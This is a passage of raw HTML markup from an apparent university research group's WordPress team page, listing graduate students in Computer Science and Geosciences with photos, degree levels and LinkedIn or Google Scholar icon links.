128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassani</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student, MS Graduate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=9KRgkCcAAAAJ&amp;hl=en&amp;oi=ao\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c140-outer\">\n            <div data-colibri-id=\"182-c140\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c140 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c141\" class=\"d-block style-854 style-local-182-c141 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2024/11/Siv-photo.jpg\" class=\"wp-image-1860 style-854-image style-local-182-c141-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c141-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-850 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sivgech Heang</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c143\" class=\"h-text h-text-component style-851 style-local-182-c143 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c144\" class=\"h-text h-text-component style-902 style-local-182-c144 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c145\" class=\"style-855 style-local-182-c145 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sivgech-heang-91842618a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 